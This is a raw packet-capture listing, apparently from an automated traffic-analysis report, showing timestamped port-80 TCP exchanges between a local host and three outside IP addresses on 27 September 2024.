                                                                          Sep 27, 2024 04:21:17.547976017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.547977924 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.547992945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.548002958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.548006058 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.548018932 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.548036098 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.548057079 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.549048901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549061060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549073935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549092054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549099922 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.549103022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549118042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549129009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549139023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549144983 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.549215078 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.549283981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549350023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549355984 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.549361944 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549375057 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549386024 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549396992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549397945 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.549422026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549437046 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.549460888 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.549690008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549740076 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.549777985 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549787998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549810886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549820900 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.549823999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549835920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549840927 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.549849987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549860954 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.549864054 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.549899101 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.550221920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550235033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550246000 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550276995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.550311089 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550322056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550323009 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.550334930 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550347090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550358057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550359964 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.550368071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550399065 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550405025 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.550412893 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550457954 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550467968 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550477028 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.550484896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550497055 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.550497055 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550512075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.550529957 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.550563097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.551148891 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551161051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551171064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551186085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551206112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551213026 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.551218033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551230907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551243067 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551254034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551265001 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.551286936 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551295996 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.551302910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551315069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551321983 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.551325083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551338911 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.551364899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.551398039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.562288046 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.562300920 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.562310934 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.562329054 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.562339067 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.562349081 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.562364101 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.562392950 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.562402964 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.562413931 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.562494040 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.575258970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575269938 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575279951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575294018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575309992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575320959 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575330019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.575334072 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575345993 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575402975 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.575711966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575721979 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575731993 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575752020 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575761080 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575771093 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575774908 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.575782061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.575820923 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.576462030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.576473951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.576484919 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.576509953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.576519966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.576522112 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.576530933 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.576544046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.576567888 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.576585054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.576592922 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.576623917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579212904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579225063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579235077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579252958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579262972 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579273939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579281092 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579288960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579333067 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579351902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579363108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579374075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579391003 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579396963 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579421043 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579471111 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579504013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579520941 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579531908 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579541922 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579552889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579555035 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579571009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579581976 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579588890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579596996 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579627991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579643965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579655886 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579655886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579668999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.579699993 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.579730988 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.598841906 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.598862886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.598875046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.598886013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.598897934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.598908901 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.598911047 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.598923922 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.598963022 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.598999023 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.599417925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.599430084 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.599442959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.599464893 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.599476099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.599487066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.599490881 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.599503994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.599509954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.599550009 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.608145952 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608227015 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608237982 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608283043 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608294010 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608304977 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608315945 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608330011 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608354092 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608354092 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608380079 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608447075 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608457088 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608467102 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608477116 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608488083 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608499050 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608510017 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608511925 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608511925 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608520985 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608556986 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608556986 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608587027 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608597994 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608608007 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608619928 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608628988 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608630896 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608649015 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608702898 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608714104 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608717918 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608726025 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608736992 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608747959 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608758926 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608809948 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608809948 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608906984 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608917952 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608928919 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608956099 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.608969927 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608982086 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.608999968 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609004974 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609010935 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609010935 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609021902 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609034061 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609069109 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609069109 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609117031 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609127045 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609137058 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609148026 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609162092 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609210014 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609220982 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609230042 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609241009 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609249115 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609277964 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609277964 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609294891 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609304905 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609316111 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609354973 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609354973 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609392881 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609402895 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609410048 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609415054 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609421015 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609469891 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609479904 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609491110 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609510899 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609520912 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609533072 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609544992 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609544992 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609582901 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609594107 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609632015 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609632015 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609635115 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609647036 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609657049 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609668016 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609669924 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609718084 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609810114 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609819889 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609831095 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609848976 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609853029 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609860897 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609873056 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609884024 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609894037 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.609905005 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.609905005 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.610131979 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.633444071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.633455992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.633466959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.633505106 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.633527994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.633539915 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.633549929 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.633554935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.633563995 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.633589983 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.633621931 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.636007071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.636019945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.636029959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.636040926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.636053085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.636063099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.636074066 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.636075974 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.636142969 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.640311956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640347004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640357971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640366077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.640408039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.640408039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.640428066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640439034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640450001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640460014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640474081 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640527964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640539885 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640549898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640552998 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.640552998 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.640562057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640574932 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.640609026 CEST8049725185.215.113.117192.168.2.5
